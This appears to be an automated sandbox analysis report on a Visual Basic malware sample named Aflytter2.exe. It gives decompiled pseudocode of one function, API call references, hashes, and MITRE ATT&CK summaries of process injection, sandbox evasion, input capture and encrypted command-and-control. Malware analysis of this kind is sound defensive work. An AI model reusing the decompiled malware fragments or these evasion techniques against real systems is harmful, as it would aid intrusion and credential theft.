				void* _t142;
				intOrPtr _t143;

				_t143 = _t142 - 0xc;
				 *[fs:0x0] = _t143;
				L00401480();
				_v16 = _t143;
				_v12 = 0x401448;
				_v8 = 0;
				_t97 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401486, _t140);
				L00401660();
				_push(0x40da8c);
				L0040153A();
				if(_t97 != 2) {
					if( *0x41331c != 0) {
						_v148 = 0x41331c;
					} else {
						_push(0x41331c);
						_push(0x40da28);
						L004016DE();
						_v148 = 0x41331c;
					}
					_v124 =  *_v148;
					_t123 =  *((intOrPtr*)( *_v124 + 0x1c))(_v124,  &_v36);
					asm("fclex");
					_v128 = _t123;
					if(_v128 >= 0) {
						_v152 = _v152 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x40da18);
						_push(_v124);
						_push(_v128);
						L004016D8();
						_v152 = _t123;
					}
					_v132 = _v36;
					_t128 =  *((intOrPtr*)( *_v132 + 0x64))(_v132, 1,  &_v120);
					asm("fclex");
					_v136 = _t128;
					if(_v136 >= 0) {
						_v156 = _v156 & 0x00000000;
					} else {
						_push(0x64);
						_push(0x40da78);
						_push(_v132);
						_push(_v136);
						L004016D8();
						_v156 = _t128;
					}
					_v28 = _v120;
					L004016C0();
				}
				if(0 != 0) {
					_t117 =  *((intOrPtr*)( *_a4 + 0x710))(_a4);
					_v124 = _t117;
					if(_v124 >= 0) {
						_v160 = _v160 & 0x00000000;
					} else {
						_push(0x710);
						_push(0x40d680);
						_push(_a4);
						_push(_v124);
						L004016D8();
						_v160 = _t117;
					}
				}
				_v92 = 0x40dfa0;
				_v100 = 8;
				L0040167E();
				_push( &_v52);
				_push( &_v68);
				L00401534();
				_v108 = 0x40dfac;
				_v116 = 0x8008;
				_push( &_v68);
				_t102 =  &_v116;
				_push(_t102);
				L00401648();
				_v124 = _t102;
				_push( &_v68);
				_push( &_v52);
				_push(2);
				L0040164E();
				_t105 = _v124;
				if(_t105 != 0) {
					if( *0x41331c != 0) {
						_v164 = 0x41331c;
					} else {
						_push(0x41331c);
						_push(0x40da28);
						L004016DE();
						_v164 = 0x41331c;
					}
					_v124 =  *_v164;
					_t111 =  *((intOrPtr*)( *_v124 + 0x1c))(_v124,  &_v36);
					asm("fclex");
					_v128 = _t111;
					if(_v128 >= 0) {
						_v168 = _v168 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x40da18);
						_push(_v124);
						_push(_v128);
						L004016D8();
						_v168 = _t111;
					}
					_v132 = _v36;
					_t105 =  *((intOrPtr*)( *_v132 + 0x50))(_v132);
					asm("fclex");
					_v136 = _t105;
					if(_v136 >= 0) {
						_v172 = _v172 & 0x00000000;
					} else {
						_push(0x50);
						_push(0x40da78);
						_push(_v132);
						_push(_v136);
						L004016D8();
						_v172 = _t105;
					}
					L004016C0();
				}
				_push(0x4116ce);
				L004016C6();
				return _t105;
			}

0x0041140c
0x0041141b
0x00411427
0x0041142f
0x00411432
0x00411439
0x00411448
0x00411451
0x00411456
0x0041145b
0x00411463
0x00411470
0x0041148d
0x00411472
0x00411472
0x00411477
0x0041147c
0x00411481
0x00411481
0x0041149f
0x004114ae
0x004114b1
0x004114b3
0x004114ba
0x004114d6
0x004114bc
0x004114bc
0x004114be
0x004114c3
0x004114c6
0x004114c9
0x004114ce
0x004114ce
0x004114e0
0x004114f1
0x004114f4
0x004114f6
0x00411503
0x00411522
0x00411505
0x00411505
0x00411507
0x0041150c
0x0041150f
0x00411515
0x0041151a
0x0041151a
0x0041152d
0x00411534
0x00411534
0x0041153d
0x00411547
0x0041154d
0x00411554
0x00411573
0x00411556
0x00411556
0x0041155b
0x00411560
0x00411563
0x00411566
0x0041156b
0x0041156b
0x00411554
0x0041157a
0x00411581
0x0041158e
0x00411596
0x0041159a
0x0041159b
0x004115a0
0x004115a7
0x004115b1
0x004115b2
0x004115b5
0x004115b6
0x004115bb
0x004115c2
0x004115c6
0x004115c7
0x004115c9
0x004115d1
0x004115d7
0x004115e4
0x00411601
0x004115e6
0x004115e6
0x004115eb
0x004115f0
0x004115f5
0x004115f5
0x00411613
0x00411622
0x00411625
0x00411627
0x0041162e
0x0041164a
0x00411630
0x00411630
0x00411632
0x00411637
0x0041163a
0x0041163d
0x00411642
0x00411642
0x00411654
0x0041165f
0x00411662
0x00411664
0x00411671
0x00411690
0x00411673
0x00411673
0x00411675
0x0041167a
0x0041167d
0x00411683
0x00411688
0x00411688
0x0041169a
0x0041169a
0x0041169f
0x004116c8
0x004116cd

APIs

__vbaChkstk.MSVBVM60(?,00401486), ref: 00411427
__vbaStrCopy.MSVBVM60(?,?,?,?,00401486), ref: 00411451
__vbaLenBstrB.MSVBVM60(0040DA8C,?,?,?,?,00401486), ref: 0041145B
__vbaNew2.MSVBVM60(0040DA28,0041331C,0040DA8C,?,?,?,?,00401486), ref: 0041147C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA18,0000001C), ref: 004114C9
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA78,00000064), ref: 00411515
__vbaFreeObj.MSVBVM60(00000000,?,0040DA78,00000064), ref: 00411534
__vbaHresultCheckObj.MSVBVM60(00000000,00401448,0040D680,00000710), ref: 00411566
__vbaVarDup.MSVBVM60 ref: 0041158E
#522.MSVBVM60(?,?), ref: 0041159B
__vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?), ref: 004115B6
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008008,?,?,?,?,?), ref: 004115C9
__vbaNew2.MSVBVM60(0040DA28,0041331C,?,?,00401486), ref: 004115F0
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA18,0000001C), ref: 0041163D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA78,00000050), ref: 00411683
__vbaFreeObj.MSVBVM60(00000000,?,0040DA78,00000050), ref: 0041169A
__vbaFreeStr.MSVBVM60(004116CE,?,?,00401486), ref: 004116C8

Memory Dump Source

Source File: 00000000.00000002.1172398438.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1172392298.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1172410471.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1172416568.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$Free$New2$#522BstrChkstkCopyList
String ID:
API String ID: 1141394789-0
Opcode ID: aae97455995d640d86558ce8229534adfbf50e011d620c95fec4a5264317aab0
Instruction ID: 717961f572f007dcd998733839a2a5eeaec60e7b3861b17b2a6356610a60ff76
Opcode Fuzzy Hash: aae97455995d640d86558ce8229534adfbf50e011d620c95fec4a5264317aab0
Instruction Fuzzy Hash: 3C81E370E00218EFDF209FA5CC45BEDBBB4BF08305F14406AE505BB2A2DB7999858F59

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Aflytter2.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

System Behavior

Analysis Process: Aflytter2.exe PID: 7120 Parent PID: 6048

General

Chronological Activities

Disassembly

Code Analysis

Analysis Process: Aflytter2.exe PID: 7120 Parent PID: 6048 Aflytter2.exeCOMMON

Executed Functions

Function 00408F84, Relevance: .9, Instructions: 890COMMON

Function 0040EA99, Relevance: 414.6, APIs: 198, Strings: 38, Instructions: 1642COMMON

Function 00410881, Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 169COMMON

Function 0040EA99, Relevance: 414.6, APIs: 198, Strings: 38, Instructions: 1642
COMMON

Function 00410881, Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 169
COMMON

Function 0040E774, Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 224
COMMON

Function 00411808, Relevance: 43.9, APIs: 21, Strings: 4, Instructions: 186
COMMON

Function 00410AF6, Relevance: 43.9, APIs: 22, Strings: 3, Instructions: 155
COMMON

Function 00410F2A, Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 197
COMMON

Function 00411209, Relevance: 38.6, APIs: 19, Strings: 3, Instructions: 127
COMMON

Function 00410D27, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 140
COMMON

Function 004116ED, Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 69
COMMON

Function 00411409, Relevance: 25.7, APIs: 17, Instructions: 180
COMMON